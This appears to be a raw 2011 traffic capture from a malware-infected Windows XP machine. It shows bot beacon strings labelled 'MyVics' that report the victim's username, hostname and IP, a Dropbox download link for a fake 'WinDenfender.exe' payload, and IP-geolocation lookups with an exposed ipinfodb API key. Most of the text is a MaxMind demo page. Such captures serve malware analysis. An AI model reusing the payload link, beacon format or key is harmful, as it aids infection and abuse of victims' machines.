x0x74641d1bb511aed00402daada8d8706f74b477e3172d0ca020deab3b43c16441a73dx11811x181100x4951http://dl.dropbox.com/u/22022501/WinDenfender.exe2x7311x7342173.168.100.25530749998192rdx1094dos0x5310x0135MyVics172.16.2.34000DaveHOME-OFF-D5F0AC1Microsoft Windows XP59204.288B1E97E0newMarch 6, 2011C:\WINDOWS\system32\cmd.exex7413UNITED STATESx1182-1x1093dosx1184-20x533101C:\WINDOWS\system32\cmd.exeHTTP/1.1 200 OK
Date: Sun, 06 Mar 2011 20:27:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Vary: Accept-Encoding
Content-Length: 181
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<Response>
	<Ip>74.115.209.157</Ip>
	<Status>OK</Status>
	<CountryCode>US</CountryCode>
	<CountryName>United States</CountryName>
</Response>
GET /v2/ip_query_country.php?key=1d1bb511aed00402daada8d8706f74b477e3172d0ca020deab3b43c16441a73d&timezone=off HTTP/1.1
Host: api.ipinfodb.com
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090612 Firefox/3.5
Connection: closed

HTTP/1.1 200 OK
Date: Sun, 06 Mar 2011 20:41:50 GMT
Content-Type: text/html
X-Req-Start: t=1299444110185186
X-Req-Proc: D=814
Connection: close
Transfer-Encoding: chunked

1f40
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>MaxMind - GeoIP for your IP address </title>
<base href="http://www.maxmind.com/app/">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/maxmind_styles.css" rel="stylesheet" type="text/css">
<link REL="shortcut icon" HREF="/favicon.ico" TYPE="image/x-icon">

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-171943-1";
urchinTracker();
</script>

</head>

<body bgcolor="#FFFFFF" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">


<table width="735" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
        <tr valign="middle">
          <td width="240"><a href="/"><img src="/images/maxmind_logo.gif" alt="MaxMind" width="191" height="46" vspace="12" border="0"></a></td>
          <td width="140">






</td>
          <td align="right">
<table width="320" border="0" cellspacing="0" cellpadding="0">
              <tr align="center">

                <td width="25%"><a href="support"><img src="/images/icon_contact_blue.gif" alt="Support" width="28" height="28" border="0" vspace="5"></a></td>


                <td width="25%"><a href="account"><img src="/images/icon_account_blue.gif" alt="My Account" width="28" height="28" border="0"></a></td>


                <td width="25%"><a href="faq"><img src="/images/icon_faq_blue.gif" alt="FAQ" width="28" height="28" border="0"></a></td>


                <td width="25%"><a href="cart"><img src="/images/icon_shopcart_blue.gif" alt="My Order" width="28" height="28" border="0"></a></td>

              </tr>
              <tr align="center">

                <td><a class="navIcon" href="support">Support</a></td>


                <td><a class="navIcon" href="account">My Account</a></td>


                <td><a class="navIcon" href="faq">FAQ</a></td>


                <td><a class="navIcon" href="cart">My Order</a></td>

              </tr>
            </table>
          </td>
        </tr>
      </table>
      <table width="100%" border="0" cellspacing="0" cellpadding="0">
        <tr>
          <td width="180" valign="middle" bgcolor="#A4B3C7">
              <table width="100%" border="0" cellspacing="0" cellpadding="0"><form method=get action="http://search.yahoo.com/search">
                <tr>
                  <td width="10"><img src="/images/spacer.gif" width="10" height="24"></td>
                  <td>
                    <input maxlength="30" name="p" class="searchField" type="text" size="13">
                  </td>
                  <td height="24" align="right"><input value="search" class="searchButton" type="submit">
<input value="maxmind.com" name="vs" type="hidden"><br><input value="yscpb" name="fr" type="hidden">
		</td>
                  <td width="10"><img src="/images/spacer.gif" width="10" height="26"></td>
                </tr></form>
              </table>
            </td>
          <td><table width="100%" border="0" cellspacing="0" cellpadding="0">
              <tr align="center" valign="middle" bgcolor="#003366" class="navTop">
                <td width="1"><img src="/images/spacer.gif" width="1" height="26"></td>
                <td width="109"><a class="navTop" href="/">Home</a></td>
                <td width="2"><img src="/images/white.gif" width="2" height="12"></td>
                <td width="109"><a class="navTop" href="ip-location">GeoIP</a></td>
                <td width="2"><img src="/images/white.gif" width="2" height="12"></td>
                <td width="109"><a class="navTop" href="ccv_overview">minFraud</a></td>
                <td width="2"><img src="/images/white.gif" width="2" height="12"></td>
                <td width="109"><a class="navTop" href="contact">Contact</a></td>
                <td width="2"><img src="/images/white.gif" width="2" height="12"></td>

                <td width="110"><a class="navTop" href="about">Company</a></td>

              </tr>
            </table></td>
        </tr>
      </table>
      <table width="100%" border="0" cellspacing="0" cellpadding="0">
        <tr>
          <td width="180" valign="top" bgcolor="#E8ECF1">
            <table width="180" border="0" cellspacing="0" cellpadding="0">


               <tr bgcolor="#547093">
                <td width="10"><img src="/images/spacer.gif" width="10" height="3"></td>
                <td><img src="/images/spacer.gif" width="10" height="3"></td>
                <td width="10"><img src="/images/spacer.gif" width="10" height="3"></td>
              </tr>
              <tr bgcolor="#B8C4D3">
                <td width="10"><img src="/images/spacer.gif" width="10" height="22"></td>
                <td class="navLeftTitle"></td>
                <td width="10"><img src="/images/spacer.gif" width="10" height="22"></td>
              </tr>
              <tr bgcolor="#547093">
                <td width="10"><img src="/images/spacer.gif" width="10" height="1"></td>
                <td><img src="/images/spacer.gif" width="10" height="1"></td>
                <td width="10"><img src="/images/spacer.gif" width="10" height="1"></td>
              </tr>





  <tr>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="22"></td>
<td align="left" valign="middle" bgcolor="#E8ECF1"><a class="navLeftLink" href="ip-locate">What is GeoIP?</a></td>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="22"></td>
</tr>


   <tr>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="1"></td>
<td align="left" valign="middle" bgcolor="#A4B3C7"><img src="/images/spacer.gif" width="10" height="1"></td>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="1"></td>
</tr>



  <tr>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="22"></td>
<td align="left" valign="middle" bgcolor="#E8ECF1"><a class="navLeftLink" href="geoipclients">Clients</a></td>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="22"></td>
</tr>


   <tr>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="1"></td>
<td align="left" valign="middle" bgcolor="#A4B3C7"><img src="/images/spacer.gif" width="10" height="1"></td>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="1"></td>
</tr>



  <tr>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="22"></td>
<td align="left" valign="middle" bgcolor="#E8ECF1"><a class="navLeftLink" href="geoip_features">Feature Comparison</a></td>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="22"></td>
</tr>


   <tr>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="1"></td>
<td align="left" valign="middle" bgcolor="#A4B3C7"><img src="/images/spacer.gif" width="10" height="1"></td>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="1"></td>
</tr>



  <tr>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="22"></td>
<td align="left" valign="middle" bgcolor="#E8ECF1"><a class="navLeftLink" href="purchase">Purchasing</a></td>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="22"></td>
</tr>


   <tr>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="1"></td>
<td align="left" valign="middle" bgcolor="#A4B3C7"><img src="/images/spacer.gif" width="10" height="1"></td>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="1"></td>
</tr>



  <tr>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="22"></td>
<td align="left" valign="middle" bgcolor="#E8ECF1"><a class="navLeftLink" href="s
11f3
itelicense">GeoIP License</a></td>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="22"></td>
</tr>


   <tr>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="1"></td>
<td align="left" valign="middle" bgcolor="#A4B3C7"><img src="/images/spacer.gif" width="10" height="1"></td>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="1"></td>
</tr>



  <tr>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="22"></td>
<td align="left" valign="middle" bgcolor="#E8ECF1"><a class="navLeftLink" href="locate_demo_ip">Online Demo</a></td>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="22"></td>
</tr>


   <tr>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="1"></td>
<td align="left" valign="middle" bgcolor="#A4B3C7"><img src="/images/spacer.gif" width="10" height="1"></td>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="1"></td>
</tr>



  <tr>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="22"></td>
<td align="left" valign="middle" bgcolor="#E8ECF1"><a class="navLeftLink" href="products">Buy Now</a></td>
<td width="10" bgcolor="#E8ECF1"><img src="/images/spacer.gif" width="10" height="22"></td>
</tr>











              <tr>
                <td valign="top" bgcolor="#A4B3C7"><img src="/images/spacer.gif" width="10" height="1"></td>
                <td align="left" valign="middle" bgcolor="#A4B3C7"><img src="/images/spacer.gif" width="10" height="3"></td>
                <td bgcolor="#A4B3C7"><img src="/images/spacer.gif" width="10" height="1"></td>
              </tr>
            </table>

            <br>
          </td>
          <td width="15" valign="top"><img src="/images/spacer.gif" width="15" height="100"></td>
          <td valign="top"><img src="/images/spacer.gif" width="540" height="15" vspace="0" align="top"><br>






<span class="PageHeader">GeoIP for your IP address</span><p>
<table cellpadding=0 cellspacing=0 border=0 width="100%">
 <tr>
  <td valign="top" bgcolor="#C39E7F"><img src="/img/1x1.gif" width="1" height="3"></td>
 </tr>
</table>
<p>



This is a comprehensive demo returning all of the
data available from our various GeoIP databases.

To obtain all the data returned below, you
would need to purchase
the <a href="city">GeoIP City</a>,
<a href="isp">ISP</a>, <a href="organization">Organization</a>, <a href="domain">Domain Name</a>, and
<a href="netspeed">Netspeed</a>
databases.
<p>
<table>
<tr>
<td class=tblProduct1>Your IP Address</td>
<td class=output align="center">
74.115.209.157
</td>
</tr>

<tr>
<td class=tblProduct1>Countries</td>
<td class=output align="center">
United States
</td>
</tr>

<tr>
<td class=tblProduct1>Region</td>
<td class=output align="center">
CA (California)
</td>
</tr>

<tr>
<td class=tblProduct1>US Area Code</td>
<td class=output align="center">
619
</td>
</tr>

<tr>
<td class=tblProduct1>US Metro Code</td>
<td class=output align="center">
825
</td>
</tr>

<tr>
<td class=tblProduct1>Global Cities</td>
<td class=output align="center">
San Diego
</td>
</tr>

<tr>
<td class=tblProduct1>US Zipcode*</td>
<td class=output align="center">

</td>
</tr>

<tr>
<td class=tblProduct1>Latitude/Longitude</td>
<td class=output align="center">
32.7977/-117.1322
</td>
</tr>

<tr>
<td class=tblProduct1>ISP</td>
<td class=output align="center">
Fast Serv Networks, LLC
</td>
</tr>

<tr>
<td class=tblProduct1>Organization</td>
<td class=output align="center">
Netco Solutions
</td>
</tr>

<tr>
<td class=tblProduct1>Netspeed</td>
<td class=output align="center">
Corporate
</td>
</tr>

<tr>
<td class=tblProduct1>Domain Name</td>
<td class=output align="center">

</td>
</tr>

</table>

<p>
          </td>
        </tr>
      </table>
      <table width="100%" border="0" cellspacing="0" cellpadding="0">
        <tr>
          <td><img src="/images/spacer.gif" width="10" height="3"></td>
        </tr>
        <tr>
          <td bgcolor="#B8C4D3"><img src="/images/spacer.gif" width="10" height="7"></td>
        </tr>
        <tr>
          <td align="center" valign="top"><br>
            <span class="legal"> MaxMind, GeoIP and related marks are registered trademarks of MaxMind, Inc.<br>
            Copyright &copy; 2010 MaxMind, Inc. All Rights Reserved. <a class="navLinkLeft" href="terms_of_use">Terms of use</a>.<br></span>

          </td>
        </tr>
      </table>
      <br>
      <br>
    </td>
  </tr>
</table>
</body>
</html>

0

GET /app/locate_my_ip HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.maxmind.com
Connection: Keep-Alive

x0x74641d1bb511aed00402daada8d8706f74b477e3172d0ca020deab3b43c16441a73dx11811x181100x4951http://dl.dropbox.com/u/22022501/WinDenfender.exe2x7311x7342173.168.100.25530749998192rdx0116MyVics172.16.2.34000DaveHOME-OFF-D5F0AC1Microsoft Windows XP65204.288B1E97E0oldMarch 6, 2011srssskt1x7413UNITED STATESx1182-1HTTP/1.1 200 OK
Date: Sun, 06 Mar 2011 20:28:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Vary: Accept-Encoding
Content-Length: 181
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<Response>
	<Ip>74.115.209.157</Ip>
	<Status>OK</Status>
	<CountryCode>US</CountryCode>
	<CountryName>United States</CountryName>
</Response>
GET /v2/ip_query_country.php?key=1d1bb511aed00402daada8d8706f74b477e3172d0ca020deab3b43c16441a73d&timezone=off HTTP/1.1
Host: api.ipinfodb.com
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090612 Firefox/3.5
Connection: closed

